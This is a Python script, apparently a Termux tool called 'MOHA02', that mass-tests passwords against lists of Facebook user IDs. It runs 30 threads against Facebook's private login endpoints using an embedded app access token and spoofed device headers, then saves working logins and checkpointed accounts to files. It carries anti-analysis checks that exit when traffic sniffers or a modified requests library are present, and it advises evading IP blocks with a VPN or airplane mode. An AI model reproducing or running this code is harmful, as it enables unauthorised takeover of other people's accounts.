# -*- coding: utf-8 -*-
# Modified by: Moha Al-Shalfawi
# System: MOHA02 Professional Tool

import os
import re
import time
import uuid
import hashlib
import random
import string
import requests
import sys
import json
import urllib
import io
from bs4 import BeautifulSoup
from random import randint as rr
from concurrent.futures import ThreadPoolExecutor as tred
from os import system
from datetime import datetime

modules = ['requests', 'urllib3', 'mechanize', 'rich']
for module in modules:
    try:
        __import__(module)
    except ImportError:
        os.system(f'pip install {module}')

from requests.exceptions import ConnectionError
from requests import api, models, sessions
requests.urllib3.disable_warnings()

try:
    api_body = open(api.__file__, 'r').read()
    models_body = open(models.__file__, 'r').read()
    session_body = open(sessions.__file__, 'r').read()
    word_list = ['print', 'lambda', 'zlib.decompress']
    for word in word_list:
        if word in api_body or word in models_body or word in session_body:
            exit()
except:
    pass

class sec:
    def __init__(self):
        self.__module__ = __name__
        self.__qualname__ = 'sec'
        paths = [
            '/data/data/com.termux/files/usr/lib/python3.12/site-packages/requests/sessions.py',
            '/data/data/com.termux/files/usr/lib/python3.12/site-packages/requests/api.py',
            '/data/data/com.termux/files/usr/lib/python3.12/site-packages/requests/models.py'
        ]
        for path in paths:
            if os.path.exists(path):
                if 'print' in open(path, 'r').read():
                    self.fuck()
        if os.path.exists('/storage/emulated/0/Android/data/com.guoshi.httpcanary'):
            self.fuck()

    def fuck(self):
        print(' \x1b[1;32m Security Breach Detected! ')
        exit()

method = []
oks = []
cps = []
loop = 0
user = []
passwords = []

X = '\x1b[1;37m'
rad = '\x1b[38;5;196m'
G = '\x1b[38;5;46m'
Y = '\x1b[38;5;220m'
W = '\x1b[1;37m'

def windows():
    aV = str(random.choice(range(10, 20)))
    A = f"Mozilla/5.0 (Windows; U; Windows NT {str(random.choice(range(5, 7)))}.1; en-US) AppleWebKit/534.{aV} (KHTML, like Gecko) Chrome/{str(random.choice(range(8, 12)))}.0.{str(random.choice(range(552, 661)))}.0 Safari/534.{aV}"
    bx = str(random.choice(range(34, 38)))
    bz = f'5{bx}.{str(random.choice(range(1, 36)))}'
    B = f"Mozilla/5.0 (Windows NT {str(random.choice(range(5, 7)))}.{str(random.choice(['2', '1']))}) AppleWebKit/{bz} (KHTML, like Gecko) Chrome/{str(random.choice(range(12, 42)))}.0.{str(random.choice(range(742, 2200)))}.{str(random.choice(range(1, 120)))} Safari/{bz}"
    return random.choice([A, B])

def window1():
    latest_build = rr(6000, 9000)
    latest_patch = rr(100, 200)
    D = f"Mozilla/5.0 (Windows NT {random.choice(['10.0', '11.0'])}; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.{latest_build}.{latest_patch} Safari/537.36"
    return D

sys.stdout.write('\x1b]2;𓆩【🧬 MOHA-02 SYSTEM 🧬】𓆪 \x07')

def ____banner____():
    if 'win' in sys.platform:
        os.system('cls')
    else:
        os.system('clear')
    print('\x1b[38;5;46m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━')
    print('    \x1b[38;5;50m███╗   ███╗ ██████╗ ██╗  ██╗ █████╗  \x1b[1;37m████╗')
    print('    \x1b[38;5;50m████╗ ████║██╔═══██╗██║  ██║██╔══██╗\x1b[1;37m██╔═██╗')
    print('    \x1b[38;5;50m██╔████╔██║██║   ██║███████║███████║\x1b[1;37m██║ ██║')
    print('    \x1b[38;5;50m██║╚██╔╝██║██║   ██║██╔══██║██╔══██║\x1b[1;37m██║ ██║')
    print('    \x1b[38;5;50m██║ ╚═╝ ██║╚██████╔╝██║  ██║██║  ██║\x1b[1;37m╚████╔╝')
    print('    \x1b[38;5;50m╚═╝     ╚═╝ ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝ \x1b[1;37m╚═══╝ ')
    print('\x1b[38;5;46m━━━━━━━━━━━━━\x1b[38;5;196m(\x1b[1;37m\x1b[0;45m MOHA AL-SHALFAWI \x1b[0;92m\x1b[38;5;196m)\x1b[38;5;46m━━━━━━━━━━━━━')
    print(f'       \x1b[38;5;46mAUTHOR   : \x1b[1;37mموحا الشلفاوي')
    print(f'       \x1b[38;5;46mGITHUB   : \x1b[1;37mmohamed20888')
    print(f'       \x1b[38;5;46mSTATUS   : \x1b[1;37mFILE CLONING')
    print('\x1b[38;5;46m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━')
# ==========================================================
# PART 2: FILE INPUT, PASSWORD HANDLER & HUNTING ENGINE
# ==========================================================

def linex():
    print('\x1b[38;5;46m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━')

def BNG_71_():
    ____banner____()
    print('       \x1b[38;5;196m(\x1b[1;37m1\x1b[38;5;196m)\x1b[1;37m>\x1b[38;5;196m×\x1b[1;37m<\x1b[38;5;46m START FILE CLONING (MOHA-02)')
    print('       \x1b[38;5;196m(\x1b[1;37m0\x1b[38;5;196m)\x1b[1;37m>\x1b[38;5;196m×\x1b[1;37m<\x1b[38;5;46m EXIT')
    linex()
    choice = input(f"       \x1b[38;5;196m(\x1b[1;37m★\x1b[38;5;196m)\x1b[1;37m>\x1b[38;5;196m×\x1b[1;37m<\x1b[38;5;46mCHOICE  {W}: {Y}")
    if choice in ('1', '01'):
        moha_file_clone()
    else:
        exit()

def moha_file_clone():
    global passwords
    ____banner____()
    print(f"       \x1b[38;5;196m(\x1b[1;37m★\x1b[38;5;196m)\x1b[1;37m>\x1b[38;5;196m×\x1b[1;37m<\x1b[38;5;46m EXAMPLE: /sdcard/ids.txt")
    file_path = input(f"       \x1b[38;5;196m(\x1b[1;37m★\x1b[38;5;196m)\x1b[1;37m>\x1b[38;5;196m×\x1b[1;37m<\x1b[38;5;46m ENTER FILE PATH {W}: {G}")
    try:
        prox = open(file_path, 'r').read().splitlines()
    except FileNotFoundError:
        print(f"       \x1b[38;5;196m[×] FILE NOT FOUND!"); time.sleep(2); BNG_71_()
    
    linex()
    print(f"       \x1b[38;5;196m(\x1b[1;37m★\x1b[38;5;196m)\x1b[1;37m>\x1b[38;5;196m×\x1b[1;37m<\x1b[38;5;46m HOW MANY PASSWORDS?")
    limit = int(input(f"       \x1b[38;5;196m(\x1b[1;37m★\x1b[38;5;196m)\x1b[1;37m>\x1b[38;5;196m×\x1b[1;37m<\x1b[38;5;46m ENTER NUMBER {W}: {G}"))
    linex()
    for i in range(limit):
        p = input(f"       \x1b[38;5;196m(\x1b[1;37m★\x1b[38;5;196m)\x1b[1;37m>\x1b[38;5;196m×\x1b[1;37m<\x1b[38;5;46m PASSWORD {i+1} {W}: {Y}")
        passwords.append(p)
    
    ____banner____()
    print('       \x1b[38;5;196m(\x1b[1;37mA\x1b[38;5;196m)\x1b[1;37m>\x1b[38;5;196m×\x1b[1;37m<\x1b[38;5;46m METHOD 1 (GRAPH-CAA)')
    print('       \x1b[38;5;196m(\x1b[1;37mB\x1b[38;5;196m)\x1b[1;37m>\x1b[38;5;196m×\x1b[1;37m<\x1b[38;5;46m METHOD 2 (B-API)')
    linex()
    meth = input(f"       \x1b[38;5;196m(\x1b[1;37m★\x1b[38;5;196m)\x1b[1;37m>\x1b[38;5;196m×\x1b[1;37m<\x1b[38;5;46m CHOICE {W}: {Y}").upper()
    
    with tred(max_workers=30) as pool:
        ____banner____()
        print(f"       \x1b[38;5;196m(\x1b[1;37m★\x1b[38;5;196m)\x1b[1;37m>\x1b[38;5;196m×\x1b[1;37m<\x1b[38;5;46m TOTAL IDS  : {G}{len(prox)}")
        print(f"       \x1b[38;5;196m(\x1b[1;37m★\x1b[38;5;196m)\x1b[1;37m>\x1b[38;5;196m×\x1b[1;37m<\x1b[38;5;46m STATUS     : {G}HUNTING...{W}")
        linex()
        for user_line in prox:
            uid = user_line.split('|')[0] if '|' in user_line else user_line
            if meth == 'A': pool.submit(login_1, uid)
            else: pool.submit(login_2, uid)

def login_1(uid):
    global loop, oks, cps
    session = requests.session()
    sys.stdout.write(f"\r\r\x1b[1;37m[MOHA-SCAN] \x1b[38;5;46m{loop}\x1b[1;37m|\x1b[38;5;46mOK:{len(oks)}\x1b[1;37m|\x1b[38;5;220mCP:{len(cps)} ")
    sys.stdout.flush()
    try:
        for pw in passwords:
            ua = window1()
            data = {
                'adid': str(uuid.uuid4()), 'format': 'json', 'device_id': str(uuid.uuid4()),
                'email': uid, 'password': pw, 'generate_analytics_claim': '1',
                'credentials_type': 'password', 'source': 'login',
                'error_detail_type': 'button_with_disabled', 'enroll_misauth': 'false',
                'generate_session_cookies': '1', 'generate_machine_id': '1',
                'meta_inf_fbmeta': '', 'currently_logged_in_userid': '0',
                'fb_api_req_friendly_name': 'authenticate', 'api_key': '882a8490361da98702bf97a021ddc14d',
                'access_token': '350685531728|62f8ce9f74b12f84c123cc23437a4a32'
            }
            headers = {
                'User-Agent': ua, 'Content-Type': 'application/x-www-form-urlencoded',
                'Host': 'graph.facebook.com', 'X-FB-Net-HNI': str(rr(20000, 40000)),
                'X-FB-SIM-HNI': str(rr(20000, 40000)), 'X-FB-Connection-Type': 'MOBILE.LTE',
                'X-Tigon-Is-Retry': 'False', 'x-fb-device-group': '5120',
                'X-FB-Friendly-Name': 'authenticate', 'X-FB-HTTP-Engine': 'Liger'
            }
            q = session.post('https://b-graph.facebook.com/auth/login', data=data, headers=headers, allow_redirects=False).json()
            if 'session_key' in q or 'access_token' in q:
                print(f"\r\r\x1b[38;5;46m[MOHA-OK] {uid} | {pw} \x1b[1;37m")
                oks.append(uid)
                open('/sdcard/MOHA-OK.txt', 'a').write(f"{uid}|{pw}\n")
                break
            elif 'checkpoint' in str(q) or 'error_code' in str(q) and q['error_code'] == 405:
                print(f"\r\r\x1b[38;5;220m[MOHA-CP] {uid} | {pw} \x1b[1;37m")
                cps.append(uid)
                open('/sdcard/MOHA-CP.txt', 'a').write(f"{uid}|{pw}\n")
                break
        loop += 1
    except: pass
# ==========================================================
# PART 3: METHOD 2, BLOCK DETECTION & FINAL EXECUTION
# ==========================================================

def login_2(uid):
    global loop, oks, cps
    sys.stdout.write(f"\r\r\x1b[1;37m[MOHA-SCAN] \x1b[38;5;46m{loop}\x1b[1;37m|\x1b[38;5;46mOK:{len(oks)}\x1b[1;37m|\x1b[38;5;220mCP:{len(cps)} ")
    sys.stdout.flush()
    try:
        for pw in passwords:
            with requests.Session() as session:
                ua = window1()
                # Enhanced B-API Method for direct hits
                url = f"https://b-api.facebook.com/method/auth.login"
                params = {
                    'access_token': '350685531728|62f8ce9f74b12f84c123cc23437a4a32',
                    'format': 'JSON',
                    'sdk_version': '2',
                    'email': uid,
                    'password': pw,
                    'generate_session_cookies': '1',
                    'sig': '62f8ce9f74b12f84c123cc23437a4a32'
                }
                headers = {
                    'User-Agent': ua,
                    'Content-Type': 'application/x-www-form-urlencoded',
                    'X-FB-HTTP-Engine': 'Liger'
                }
                response = session.get(url, params=params, headers=headers).text
                q = json.loads(response)
                
                if 'session_key' in q or 'access_token' in q:
                    print(f"\r\r\x1b[38;5;46m[MOHA-OK] {uid} | {pw} \x1b[1;37m")
                    oks.append(uid)
                    open('/sdcard/MOHA-OK.txt', 'a').write(f"{uid}|{pw}\n")
                    break
                elif 'checkpoint' in str(q):
                    print(f"\r\r\x1b[38;5;220m[MOHA-CP] {uid} | {pw} \x1b[1;37m")
                    cps.append(uid)
                    open('/sdcard/MOHA-CP.txt', 'a').write(f"{uid}|{pw}\n")
                    break
                elif 'calls_to_this_api_have_been_limited' in str(q) or '429' in str(q):
                    # Detecting Facebook Block
                    sys.stdout.write(f"\r\r\x1b[38;5;196m[!] FB BLOCK DETECTED - SHIFTING UA...{RESET}")
                    time.sleep(2)
        loop += 1
    except:
        pass

def check_fb_health():
    """ Checks if the current IP is blocked from Facebook APIs """
    try:
        test = requests.get("https://b-api.facebook.com/", timeout=5)
        if test.status_code == 403 or test.status_code == 429:
            return False
        return True
    except:
        return False

# --- [ FINAL SYSTEM BOOT ] ---
if __name__ == '__main__':
    try:
        # Security & Identity Check
        sec() 
        if not check_fb_health():
            print(f"\x1b[38;5;196m [!] YOUR IP IS CURRENTLY BLOCKED BY FACEBOOK.")
            print(f"\x1b[38;5;220m [!] TRY USING AIRPLANE MODE OR VPN.")
            linex()
        
        BNG_71_()
        
    except KeyboardInterrupt:
        print(f"\n\x1b[38;5;196m [!] STOPPED BY USER.")
    except Exception as e:
        print(f"\n\x1b[38;5;196m [!] ERROR: {e}")

# ==========================================================
# END OF MOHA02 SYSTEM - DEVELOPED BY MOHA AL-SHALFAWI
# ==========================================================
